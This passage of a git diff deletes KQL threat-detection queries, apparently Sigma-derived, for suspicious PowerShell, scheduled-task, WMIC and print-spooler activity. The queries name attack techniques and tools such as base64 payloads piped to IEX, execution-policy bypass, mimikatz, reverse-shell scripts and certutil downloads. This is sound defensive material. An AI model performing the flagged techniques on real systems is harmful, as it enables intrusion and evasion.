(((ProcessCommandLine contains " | iex;" or ProcessCommandLine contains " | iex " or ProcessCommandLine contains " | iex}" or ProcessCommandLine contains " | IEX ;" or ProcessCommandLine contains " | IEX -Error" or ProcessCommandLine contains " | IEX (new" or ProcessCommandLine contains ");IEX ") and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe")) and (ProcessCommandLine contains "::FromBase64String" or ProcessCommandLine contains ".GetString([System.Convert]::")) or (ProcessCommandLine contains ")|iex;$" or ProcessCommandLine contains ");iex($" or ProcessCommandLine contains ");iex $" or ProcessCommandLine contains " | IEX | " or ProcessCommandLine contains " | iex\\\"") \ No newline at end of file diff --git a/Execution/Suspicious_PowerShell_Parameter_Substring.kql b/Execution/Suspicious_PowerShell_Parameter_Substring.kql deleted file mode 100644 index 9a895de4..00000000 --- a/Execution/Suspicious_PowerShell_Parameter_Substring.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix) -// Date: 2019/01/16 -// Level: high -// Description: Detects suspicious PowerShell invocation with a parameter substring -// Tags: attack.execution, attack.t1059.001 -DeviceProcessEvents -| where (ProcessCommandLine contains " -windowstyle h " or ProcessCommandLine contains " -windowstyl h" or ProcessCommandLine contains " -windowsty h" or ProcessCommandLine contains " -windowst h" or ProcessCommandLine contains " -windows h" or ProcessCommandLine contains " -windo h" or ProcessCommandLine contains " -wind h" or ProcessCommandLine contains " -win h" or ProcessCommandLine contains " -wi h" or ProcessCommandLine contains " -win h " or ProcessCommandLine contains " -win hi " or ProcessCommandLine contains " -win hid " or ProcessCommandLine contains " -win hidd " or ProcessCommandLine contains " -win hidde " or ProcessCommandLine contains " -NoPr " or ProcessCommandLine contains " -NoPro " or ProcessCommandLine contains " -NoProf " or ProcessCommandLine contains " -NoProfi " or ProcessCommandLine contains " -NoProfil " or ProcessCommandLine contains " -nonin " or ProcessCommandLine contains " -nonint " or ProcessCommandLine contains " -noninte " or ProcessCommandLine contains " -noninter " or ProcessCommandLine contains " -nonintera " or ProcessCommandLine contains " -noninterac " or ProcessCommandLine contains " -noninteract " or ProcessCommandLine contains " -noninteracti " or ProcessCommandLine contains " -noninteractiv " or ProcessCommandLine contains " -ec " or ProcessCommandLine contains " -encodedComman " or ProcessCommandLine contains " -encodedComma " or ProcessCommandLine contains " -encodedComm " or ProcessCommandLine contains " -encodedCom " or ProcessCommandLine contains " -encodedCo " or ProcessCommandLine contains " -encodedC " or ProcessCommandLine contains " -encoded " or ProcessCommandLine contains " -encode " or ProcessCommandLine contains " -encod " or ProcessCommandLine contains " -enco " or ProcessCommandLine contains " -en " or ProcessCommandLine contains " -executionpolic " or ProcessCommandLine contains " -executionpoli " or ProcessCommandLine contains " -executionpol " or ProcessCommandLine contains " -executionpo " or ProcessCommandLine contains " -executionp " or ProcessCommandLine contains " -execution bypass" or ProcessCommandLine contains " -executio bypass" or ProcessCommandLine contains " -executi bypass" or ProcessCommandLine contains " -execut bypass" or ProcessCommandLine contains " -execu bypass" or ProcessCommandLine contains " -exec bypass" or ProcessCommandLine contains " -exe bypass" or ProcessCommandLine contains " -ex bypass" or ProcessCommandLine contains " -ep bypass" or ProcessCommandLine contains " /windowstyle h " or ProcessCommandLine contains " /windowstyl h" or ProcessCommandLine contains " /windowsty h" or ProcessCommandLine contains " /windowst h" or ProcessCommandLine contains " /windows h" or ProcessCommandLine contains " /windo h" or ProcessCommandLine contains " /wind h" or ProcessCommandLine contains " /win h" or ProcessCommandLine contains " /wi h" or ProcessCommandLine contains " /win h " or ProcessCommandLine contains " /win hi " or ProcessCommandLine contains " /win hid " or ProcessCommandLine contains " /win hidd " or ProcessCommandLine contains " /win hidde " or ProcessCommandLine contains " /NoPr " or ProcessCommandLine contains " /NoPro " or ProcessCommandLine contains " /NoProf " or ProcessCommandLine contains " /NoProfi " or ProcessCommandLine contains " /NoProfil " or ProcessCommandLine contains " /nonin " or ProcessCommandLine contains " /nonint " or ProcessCommandLine contains " /noninte " or ProcessCommandLine contains " /noninter " or ProcessCommandLine contains " /nonintera " or ProcessCommandLine contains " /noninterac " or ProcessCommandLine contains " /noninteract " or ProcessCommandLine contains " /noninteracti " or ProcessCommandLine contains " /noninteractiv " or ProcessCommandLine contains " /ec " or ProcessCommandLine contains " /encodedComman " or ProcessCommandLine contains " /encodedComma " or ProcessCommandLine contains " /encodedComm " or ProcessCommandLine contains " /encodedCom " or ProcessCommandLine contains " /encodedCo " or ProcessCommandLine contains " /encodedC " or ProcessCommandLine contains " /encoded " or ProcessCommandLine contains " /encode " or ProcessCommandLine contains " /encod " or ProcessCommandLine contains " /enco " or ProcessCommandLine contains " /en " or ProcessCommandLine contains " /executionpolic " or ProcessCommandLine contains " /executionpoli " or ProcessCommandLine contains " /executionpol " or ProcessCommandLine contains " /executionpo " or ProcessCommandLine contains " /executionp " or ProcessCommandLine contains " /execution bypass" or ProcessCommandLine contains " /executio bypass" or ProcessCommandLine contains " /executi bypass" or ProcessCommandLine contains " /execut bypass" or ProcessCommandLine contains " /execu bypass" or ProcessCommandLine contains " /exec bypass" or ProcessCommandLine contains " /exe bypass" or ProcessCommandLine contains " /ex bypass" or ProcessCommandLine contains " /ep bypass") and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") \ No newline at end of file diff --git a/Execution/Suspicious_PowerShell_Parent_Process.kql b/Execution/Suspicious_PowerShell_Parent_Process.kql deleted file mode 100644 index 04761c14..00000000 --- a/Execution/Suspicious_PowerShell_Parent_Process.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Teymur Kheirkhabarov, Harish Segar -// Date: 2020/03/20 -// Level: high -// Description: Detects a suspicious or uncommon parent processes of PowerShell -// Tags: attack.execution, attack.t1059.001 -DeviceProcessEvents -| where (InitiatingProcessFolderPath contains "tomcat" or (InitiatingProcessFolderPath endswith "\\amigo.exe" or InitiatingProcessFolderPath endswith "\\browser.exe" or InitiatingProcessFolderPath endswith "\\chrome.exe" or InitiatingProcessFolderPath endswith "\\firefox.exe" or InitiatingProcessFolderPath endswith "\\httpd.exe" or InitiatingProcessFolderPath endswith "\\iexplore.exe" or InitiatingProcessFolderPath endswith "\\jbosssvc.exe" or InitiatingProcessFolderPath endswith "\\microsoftedge.exe" or InitiatingProcessFolderPath endswith "\\microsoftedgecp.exe" or InitiatingProcessFolderPath endswith "\\MicrosoftEdgeSH.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\nginx.exe" or InitiatingProcessFolderPath endswith "\\outlook.exe" or InitiatingProcessFolderPath endswith "\\php-cgi.exe" or InitiatingProcessFolderPath endswith "\\regsvr32.exe" or InitiatingProcessFolderPath endswith "\\rundll32.exe" or InitiatingProcessFolderPath endswith "\\safari.exe" or InitiatingProcessFolderPath endswith "\\services.exe" or InitiatingProcessFolderPath endswith "\\sqlagent.exe" or InitiatingProcessFolderPath endswith "\\sqlserver.exe" or InitiatingProcessFolderPath endswith "\\sqlservr.exe" or InitiatingProcessFolderPath endswith "\\vivaldi.exe" or InitiatingProcessFolderPath endswith "\\w3wp.exe")) and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessCommandLine contains "/c powershell" or ProcessCommandLine contains "/c pwsh") or ProcessVersionInfoFileDescription =~ "Windows PowerShell" or ProcessVersionInfoProductName =~ "PowerShell Core 6" or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) \ No newline at end of file diff --git a/Execution/Suspicious_Process_Created_Via_Wmic.EXE.kql b/Execution/Suspicious_Process_Created_Via_Wmic.EXE.kql deleted file mode 100644 index c2d28b62..00000000 --- a/Execution/Suspicious_Process_Created_Via_Wmic.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) -// Date: 2020/10/12 -// Level: high -// Description: Detects WMIC executing "process call create" with suspicious calls to processes such as "rundll32", "regsrv32", etc. -// Tags: attack.execution, attack.t1047 -DeviceProcessEvents -| where (ProcessCommandLine contains "rundll32" or ProcessCommandLine contains "bitsadmin" or ProcessCommandLine contains "regsvr32" or ProcessCommandLine contains "cmd.exe /c " or ProcessCommandLine contains "cmd.exe /k " or ProcessCommandLine contains "cmd.exe /r " or ProcessCommandLine contains "cmd /c " or ProcessCommandLine contains "cmd /k " or ProcessCommandLine contains "cmd /r " or ProcessCommandLine contains "powershell" or ProcessCommandLine contains "pwsh" or ProcessCommandLine contains "certutil" or ProcessCommandLine contains "cscript" or ProcessCommandLine contains "wscript" or ProcessCommandLine contains "mshta" or ProcessCommandLine contains "\\Users\\Public\\" or ProcessCommandLine contains "\\Windows\\Temp\\" or ProcessCommandLine contains "\\AppData\\Local\\" or ProcessCommandLine contains "%temp%" or ProcessCommandLine contains "%tmp%" or ProcessCommandLine contains "%ProgramData%" or ProcessCommandLine contains "%appdata%" or ProcessCommandLine contains "%comspec%" or ProcessCommandLine contains "%localappdata%") and (ProcessCommandLine contains "process " and ProcessCommandLine contains "call " and ProcessCommandLine contains "create ") \ No newline at end of file diff --git a/Execution/Suspicious_Program_Names.kql b/Execution/Suspicious_Program_Names.kql deleted file mode 100644 index 793a6794..00000000 --- a/Execution/Suspicious_Program_Names.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2022/02/11 -// Level: high -// Description: Detects suspicious patterns in program names or folders that are often found in malicious samples or hacktools -// Tags: attack.execution, attack.t1059 -DeviceProcessEvents -| where (ProcessCommandLine contains "inject.ps1" or ProcessCommandLine contains "Invoke-CVE" or ProcessCommandLine contains "pupy.ps1" or ProcessCommandLine contains "payload.ps1" or ProcessCommandLine contains "beacon.ps1" or ProcessCommandLine contains "PowerView.ps1" or ProcessCommandLine contains "bypass.ps1" or ProcessCommandLine contains "obfuscated.ps1" or ProcessCommandLine contains "obfusc.ps1" or ProcessCommandLine contains "obfus.ps1" or ProcessCommandLine contains "obfs.ps1" or ProcessCommandLine contains "evil.ps1" or ProcessCommandLine contains "MiniDogz.ps1" or ProcessCommandLine contains "_enc.ps1" or ProcessCommandLine contains "\\shell.ps1" or ProcessCommandLine contains "\\rshell.ps1" or ProcessCommandLine contains "revshell.ps1" or ProcessCommandLine contains "\\av.ps1" or ProcessCommandLine contains "\\av_test.ps1" or ProcessCommandLine contains "adrecon.ps1" or ProcessCommandLine contains "mimikatz.ps1" or ProcessCommandLine contains "\\PowerUp_" or ProcessCommandLine contains "powerup.ps1" or ProcessCommandLine contains "\\Temp\\a.ps1" or ProcessCommandLine contains "\\Temp\\p.ps1" or ProcessCommandLine contains "\\Temp\\1.ps1" or ProcessCommandLine contains "Hound.ps1" or ProcessCommandLine contains "encode.ps1" or ProcessCommandLine contains "powercat.ps1") or ((FolderPath contains "\\CVE-202" or FolderPath contains "\\CVE202") or (FolderPath endswith "\\poc.exe" or FolderPath endswith "\\artifact.exe" or FolderPath endswith "\\artifact64.exe" or FolderPath endswith "\\artifact_protected.exe" or FolderPath endswith "\\artifact32.exe" or FolderPath endswith "\\artifact32big.exe" or FolderPath endswith "obfuscated.exe" or FolderPath endswith "obfusc.exe" or FolderPath endswith "\\meterpreter")) \ No newline at end of file diff --git a/Execution/Suspicious_RASdial_Activity.kql b/Execution/Suspicious_RASdial_Activity.kql deleted file mode 100644 index 4e30f528..00000000 --- a/Execution/Suspicious_RASdial_Activity.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: juju4 -// Date: 2019/01/16 -// Level: medium -// Description: Detects suspicious process related to rasdial.exe -// Tags: attack.defense_evasion, attack.execution, attack.t1059 -DeviceProcessEvents -| where FolderPath endswith "rasdial.exe" \ No newline at end of file diff --git a/Execution/Suspicious_Reconnaissance_Activity_Via_GatherNetworkInfo.VBS.kql b/Execution/Suspicious_Reconnaissance_Activity_Via_GatherNetworkInfo.VBS.kql deleted file mode 100644 index 62278102..00000000 --- a/Execution/Suspicious_Reconnaissance_Activity_Via_GatherNetworkInfo.VBS.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/02/08 -// Level: high -// Description: Detects execution of the built-in script located in "C:\Windows\System32\gatherNetworkInfo.vbs". Which can be used to gather information about the target machine -// Tags: attack.discovery, attack.execution, attack.t1615, attack.t1059.005 -DeviceProcessEvents -| where ProcessCommandLine contains "gatherNetworkInfo.vbs" and (not((FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\wscript.exe"))) \ No newline at end of file diff --git a/Execution/Suspicious_Remote_Child_Process_From_Outlook.kql b/Execution/Suspicious_Remote_Child_Process_From_Outlook.kql deleted file mode 100644 index 38edae09..00000000 --- a/Execution/Suspicious_Remote_Child_Process_From_Outlook.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Markus Neis, Nasreddine Bencherchali (Nextron Systems) -// Date: 2018/12/27 -// Level: high -// Description: Detects a suspicious child process spawning from Outlook where the image is located in a remote location (SMB/WebDav shares). -// Tags: attack.execution, attack.t1059, attack.t1202 -DeviceProcessEvents -| where FolderPath startswith "\\\\" and InitiatingProcessFolderPath endswith "\\outlook.exe" \ No newline at end of file diff --git a/Execution/Suspicious_Runscripthelper.exe.kql b/Execution/Suspicious_Runscripthelper.exe.kql deleted file mode 100644 index 568eff5f..00000000 --- a/Execution/Suspicious_Runscripthelper.exe.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Victor Sergeev, oscd.community -// Date: 2020/10/09 -// Level: medium -// Description: Detects execution of powershell scripts via Runscripthelper.exe -// Tags: attack.execution, attack.t1059, attack.defense_evasion, attack.t1202 -DeviceProcessEvents -| where ProcessCommandLine contains "surfacecheck" and FolderPath endswith "\\Runscripthelper.exe" \ No newline at end of file diff --git a/Execution/Suspicious_Scan_Loop_Network.kql b/Execution/Suspicious_Scan_Loop_Network.kql deleted file mode 100644 index 19d4fbec..00000000 --- a/Execution/Suspicious_Scan_Loop_Network.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2022/03/12 -// Level: medium -// Description: Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system -// Tags: attack.execution, attack.t1059, attack.discovery, attack.t1018 -DeviceProcessEvents -| where (ProcessCommandLine contains "for " or ProcessCommandLine contains "foreach ") and (ProcessCommandLine contains "nslookup" or ProcessCommandLine contains "ping") \ No newline at end of file diff --git a/Execution/Suspicious_Scheduled_Task_Creation_Involving_Temp_Folder.kql b/Execution/Suspicious_Scheduled_Task_Creation_Involving_Temp_Folder.kql deleted file mode 100644 index 00359f36..00000000 --- a/Execution/Suspicious_Scheduled_Task_Creation_Involving_Temp_Folder.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2021/03/11 -// Level: high -// Description: Detects the creation of scheduled tasks that involves a temporary folder and runs only once -// Tags: attack.execution, attack.persistence, attack.t1053.005 -DeviceProcessEvents -| where (ProcessCommandLine contains " /create " and ProcessCommandLine contains " /sc once " and ProcessCommandLine contains "\\Temp\\") and FolderPath endswith "\\schtasks.exe" \ No newline at end of file diff --git a/Execution/Suspicious_Scheduled_Task_Name_As_GUID.kql b/Execution/Suspicious_Scheduled_Task_Name_As_GUID.kql deleted file mode 100644 index 6bdb9b98..00000000 --- a/Execution/Suspicious_Scheduled_Task_Name_As_GUID.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/10/31 -// Level: medium -// Description: Detects creation of a scheduled task with a GUID like name -// Tags: attack.execution, attack.t1053.005 -DeviceProcessEvents -| where (ProcessCommandLine contains "}\"" or ProcessCommandLine contains "}'" or ProcessCommandLine contains "} ") and (ProcessCommandLine contains "/Create " and FolderPath endswith "\\schtasks.exe") and (ProcessCommandLine contains "/TN \"{" or ProcessCommandLine contains "/TN '{" or ProcessCommandLine contains "/TN {") \ No newline at end of file diff --git a/Execution/Suspicious_Scheduled_Task_Write_to_System32_Tasks.kql b/Execution/Suspicious_Scheduled_Task_Write_to_System32_Tasks.kql deleted file mode 100644 index 6ba5044f..00000000 --- a/Execution/Suspicious_Scheduled_Task_Write_to_System32_Tasks.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2021/11/16 -// Level: high -// Description: Detects the creation of tasks from processes executed from suspicious locations -// Tags: attack.persistence, attack.execution, attack.t1053 -DeviceFileEvents -| where (InitiatingProcessFolderPath contains "\\AppData\\" or InitiatingProcessFolderPath contains "C:\\PerfLogs" or InitiatingProcessFolderPath contains "\\Windows\\System32\\config\\systemprofile") and FolderPath contains "\\Windows\\System32\\Tasks" \ No newline at end of file diff --git a/Execution/Suspicious_Schtasks_Execution_AppData_Folder.kql b/Execution/Suspicious_Schtasks_Execution_AppData_Folder.kql deleted file mode 100644 index fe01afd0..00000000 --- a/Execution/Suspicious_Schtasks_Execution_AppData_Folder.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/03/15 -// Level: high -// Description: Detects the creation of a schtask that executes a file from C:\Users\\AppData\Local -// Tags: attack.execution, attack.persistence, attack.t1053.005, attack.t1059.001 -DeviceProcessEvents -| where ((ProcessCommandLine contains "NT AUT" or ProcessCommandLine contains " SYSTEM ") and (ProcessCommandLine contains "/Create" and ProcessCommandLine contains "/RU" and ProcessCommandLine contains "/TR" and ProcessCommandLine contains "C:\\Users\\" and ProcessCommandLine contains "\\AppData\\Local\\") and FolderPath endswith "\\schtasks.exe") and (not((ProcessCommandLine contains "/TN TVInstallRestore" and FolderPath endswith "\\schtasks.exe" and (InitiatingProcessFolderPath contains "\\AppData\\Local\\Temp\\" and InitiatingProcessFolderPath contains "TeamViewer_.exe")))) \ No newline at end of file diff --git a/Execution/Suspicious_Schtasks_From_Env_Var_Folder.kql b/Execution/Suspicious_Schtasks_From_Env_Var_Folder.kql deleted file mode 100644 index cd2233e3..00000000 --- a/Execution/Suspicious_Schtasks_From_Env_Var_Folder.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2022/02/21 -// Level: medium -// Description: Detects Schtask creations that point to a suspicious folder or an environment variable often used by malware -// Tags: attack.execution, attack.t1053.005 -DeviceProcessEvents -| where (((ProcessCommandLine contains ":\\Perflogs" or ProcessCommandLine contains ":\\Windows\\Temp" or ProcessCommandLine contains "\\AppData\\Local\\" or ProcessCommandLine contains "\\AppData\\Roaming\\" or ProcessCommandLine contains "\\Users\\Public" or ProcessCommandLine contains "%AppData%" or ProcessCommandLine contains "%Public%") and (ProcessCommandLine contains " /create " and FolderPath endswith "\\schtasks.exe")) or (InitiatingProcessCommandLine endswith "\\svchost.exe -k netsvcs -p -s Schedule" and (ProcessCommandLine contains ":\\Perflogs" or ProcessCommandLine contains ":\\Windows\\Temp" or ProcessCommandLine contains "\\Users\\Public" or ProcessCommandLine contains "%Public%"))) and (not(((ProcessCommandLine contains "/Create /Xml \"C:\\Users\\" and ProcessCommandLine contains "\\AppData\\Local\\Temp\\.CR." and ProcessCommandLine contains "Avira_Security_Installation.xml") or ((ProcessCommandLine contains ".tmp\\UpdateFallbackTask.xml" or ProcessCommandLine contains ".tmp\\WatchdogServiceControlManagerTimeout.xml" or ProcessCommandLine contains ".tmp\\SystrayAutostart.xml" or ProcessCommandLine contains ".tmp\\MaintenanceTask.xml") and (ProcessCommandLine contains "/Create /F /TN" and ProcessCommandLine contains "/Xml " and ProcessCommandLine contains "\\AppData\\Local\\Temp\\is-" and ProcessCommandLine contains "Avira_")) or (ProcessCommandLine contains "\\AppData\\Local\\Temp\\" and ProcessCommandLine contains "/Create /TN \"klcp_update\" /XML " and ProcessCommandLine contains "\\klcp_update_task.xml") or ((ProcessCommandLine contains "update_task.xml" or ProcessCommandLine contains "/Create /TN TVInstallRestore /TR") or InitiatingProcessCommandLine contains "unattended.ini")))) \ No newline at end of file diff --git a/Execution/Suspicious_Schtasks_Schedule_Type_With_High_Privileges.kql b/Execution/Suspicious_Schtasks_Schedule_Type_With_High_Privileges.kql deleted file mode 100644 index 5bf43f5b..00000000 --- a/Execution/Suspicious_Schtasks_Schedule_Type_With_High_Privileges.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/08/31 -// Level: medium -// Description: Detects scheduled task creations or modification to be run with high privileges on a suspicious schedule type -// Tags: attack.execution, attack.t1053.005 -DeviceProcessEvents -| where (FolderPath endswith "\\schtasks.exe" or ProcessVersionInfoOriginalFileName =~ "schtasks.exe") and (ProcessCommandLine contains "NT AUT" or ProcessCommandLine contains " SYSTEM" or ProcessCommandLine contains "HIGHEST") and (ProcessCommandLine contains " ONLOGON " or ProcessCommandLine contains " ONSTART " or ProcessCommandLine contains " ONCE " or ProcessCommandLine contains " ONIDLE ") \ No newline at end of file diff --git a/Execution/Suspicious_Schtasks_Schedule_Types.kql b/Execution/Suspicious_Schtasks_Schedule_Types.kql deleted file mode 100644 index 93316841..00000000 --- a/Execution/Suspicious_Schtasks_Schedule_Types.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/09/09 -// Level: high -// Description: Detects scheduled task creations or modification on a suspicious schedule type -// Tags: attack.execution, attack.t1053.005 -DeviceProcessEvents -| where ((FolderPath endswith "\\schtasks.exe" or ProcessVersionInfoOriginalFileName =~ "schtasks.exe") and (ProcessCommandLine contains " ONLOGON " or ProcessCommandLine contains " ONSTART " or ProcessCommandLine contains " ONCE " or ProcessCommandLine contains " ONIDLE ")) and (not((ProcessCommandLine contains "NT AUT" or ProcessCommandLine contains " SYSTEM" or ProcessCommandLine contains "HIGHEST"))) \ No newline at end of file diff --git a/Execution/Suspicious_Script_Execution_From_Temp_Folder.kql b/Execution/Suspicious_Script_Execution_From_Temp_Folder.kql deleted file mode 100644 index 3b3ce9ee..00000000 --- a/Execution/Suspicious_Script_Execution_From_Temp_Folder.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton -// Date: 2021/07/14 -// Level: high -// Description: Detects a suspicious script executions from temporary folder -// Tags: attack.execution, attack.t1059 -DeviceProcessEvents -| where ((ProcessCommandLine contains "\\Windows\\Temp" or ProcessCommandLine contains "\\Temporary Internet" or ProcessCommandLine contains "\\AppData\\Local\\Temp" or ProcessCommandLine contains "\\AppData\\Roaming\\Temp" or ProcessCommandLine contains "%TEMP%" or ProcessCommandLine contains "%TMP%" or ProcessCommandLine contains "%LocalAppData%\\Temp") and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\cscript.exe")) and (not((ProcessCommandLine contains " >" or ProcessCommandLine contains "Out-File" or ProcessCommandLine contains "ConvertTo-Json" or ProcessCommandLine contains "-WindowStyle hidden -Verb runAs" or ProcessCommandLine contains "\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\Temp\\Amazon\\EC2-Windows\\"))) \ No newline at end of file diff --git a/Execution/Suspicious_Spool_Service_Child_Process.kql b/Execution/Suspicious_Spool_Service_Child_Process.kql deleted file mode 100644 index 9e6385cb..00000000 --- a/Execution/Suspicious_Spool_Service_Child_Process.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Justin C. (@endisphotic), @dreadphones (detection), Thomas Patzke (Sigma rule) -// Date: 2021/07/11 -// Level: high -// Description: Detects suspicious print spool service (spoolsv.exe) child processes. -// Tags: attack.execution, attack.t1203, attack.privilege_escalation, attack.t1068 -DeviceProcessEvents -| where (ProcessIntegrityLevel =~ "System" and InitiatingProcessFolderPath endswith "\\spoolsv.exe") and ((FolderPath endswith "\\gpupdate.exe" or FolderPath endswith "\\whoami.exe" or FolderPath endswith "\\nltest.exe" or FolderPath endswith "\\taskkill.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\taskmgr.exe" or FolderPath endswith "\\sc.exe" or FolderPath endswith "\\findstr.exe" or FolderPath endswith "\\curl.exe" or FolderPath endswith "\\wget.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\accesschk.exe" or FolderPath endswith "\\wevtutil.exe" or FolderPath endswith "\\bcdedit.exe" or FolderPath endswith "\\fsutil.exe" or FolderPath endswith "\\cipher.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\write.exe" or FolderPath endswith "\\wuauclt.exe" or FolderPath endswith "\\systeminfo.exe" or FolderPath endswith "\\reg.exe" or FolderPath endswith "\\query.exe") or ((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") and (not(ProcessCommandLine contains "start"))) or (FolderPath endswith "\\cmd.exe" and (not((ProcessCommandLine contains ".spl" or ProcessCommandLine contains "route add" or ProcessCommandLine contains "program files")))) or (FolderPath endswith "\\netsh.exe" and (not((ProcessCommandLine contains "add portopening" or ProcessCommandLine contains "rule name")))) or ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") and (not(ProcessCommandLine contains ".spl"))) or (ProcessCommandLine endswith "rundll32.exe" and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE"))) \ No newline at end of file diff --git a/Execution/Suspicious_Use_of_CSharp_Interactive_Console.kql b/Execution/Suspicious_Use_of_CSharp_Interactive_Console.kql deleted file mode 100644 index 027c40e7..00000000 --- a/Execution/Suspicious_Use_of_CSharp_Interactive_Console.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Michael R. (@nahamike01) -// Date: 2020/03/08 -// Level: high -// Description: Detects the execution of CSharp interactive console by PowerShell -// Tags: attack.execution, attack.t1127 -DeviceProcessEvents -| where FolderPath endswith "\\csi.exe" and ProcessVersionInfoOriginalFileName =~ "csi.exe" and (InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe" or InitiatingProcessFolderPath endswith "\\powershell_ise.exe") \ No newline at end of file diff --git a/Execution/Suspicious_WMIC_Execution_Via_Office_Process.kql b/Execution/Suspicious_WMIC_Execution_Via_Office_Process.kql deleted file mode 100644 index bf07a61d..00000000 --- a/Execution/Suspicious_WMIC_Execution_Via_Office_Process.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Vadim Khrykov, Cyb3rEng -// Date: 2021/08/23 -// Level: high -// Description: Office application called wmic to proxye execution through a LOLBIN process. This is often used to break suspicious parent-child chain (Office app spawns LOLBin). -// Tags: attack.t1204.002, attack.t1047, attack.t1218.010, attack.execution, attack.defense_evasion -DeviceProcessEvents -| where (InitiatingProcessFolderPath endswith "\\WINWORD.EXE" or InitiatingProcessFolderPath endswith "\\EXCEL.EXE" or InitiatingProcessFolderPath endswith "\\POWERPNT.exe" or InitiatingProcessFolderPath endswith "\\MSPUB.exe" or InitiatingProcessFolderPath endswith "\\VISIO.exe" or InitiatingProcessFolderPath endswith "\\MSACCESS.EXE" or InitiatingProcessFolderPath endswith "\\EQNEDT32.EXE" or InitiatingProcessFolderPath endswith "\\ONENOTE.EXE" or InitiatingProcessFolderPath endswith "\\wordpad.exe" or InitiatingProcessFolderPath endswith "\\wordview.exe") and ((ProcessCommandLine contains "regsvr32" or ProcessCommandLine contains "rundll32" or ProcessCommandLine contains "msiexec" or ProcessCommandLine contains "mshta" or ProcessCommandLine contains "verclsid" or ProcessCommandLine contains "wscript" or ProcessCommandLine contains "cscript") and (ProcessCommandLine contains "process" and ProcessCommandLine contains "create" and ProcessCommandLine contains "call")) and (FolderPath endswith "\\wbem\\WMIC.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe") \ No newline at end of file diff --git a/Execution/Suspicious_WSMAN_Provider_Image_Loads.kql b/Execution/Suspicious_WSMAN_Provider_Image_Loads.kql deleted file mode 100644 index 11e20190..00000000 --- a/Execution/Suspicious_WSMAN_Provider_Image_Loads.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) -// Date: 2020/06/24 -// Level: medium -// Description: Detects signs of potential use of the WSMAN provider from uncommon processes locally and remote execution. -// Tags: attack.execution, attack.t1059.001, attack.lateral_movement, attack.t1021.003 -DeviceImageLoadEvents -| where (((FolderPath endswith "\\WsmSvc.dll" or FolderPath endswith "\\WsmAuto.dll" or FolderPath endswith "\\Microsoft.WSMan.Management.ni.dll") or (InitiatingProcessVersionInfoOriginalFileName in~ ("WsmSvc.dll", "WSMANAUTOMATION.DLL", "Microsoft.WSMan.Management.dll"))) or (InitiatingProcessFolderPath endswith "\\svchost.exe" and InitiatingProcessVersionInfoOriginalFileName =~ "WsmWmiPl.dll")) and (not((InitiatingProcessFolderPath startswith "C:\\Program Files\\Citrix\\" or (InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "C:\\Windows\\System32\\sdiagnhost.exe" or InitiatingProcessFolderPath endswith "C:\\Windows\\System32\\services.exe") or (InitiatingProcessFolderPath endswith "\\mscorsvw.exe" and (InitiatingProcessFolderPath startswith "C:\\Windows\\Microsoft.NET\\Framework64\\v" or InitiatingProcessFolderPath startswith "C:\\Windows\\Microsoft.NET\\Framework\\v")) or InitiatingProcessFolderPath startswith "C:\\Windows\\Temp\\asgard2-agent\\" or InitiatingProcessFolderPath endswith "\\powershell_ise.exe" or (InitiatingProcessCommandLine contains "svchost.exe -k 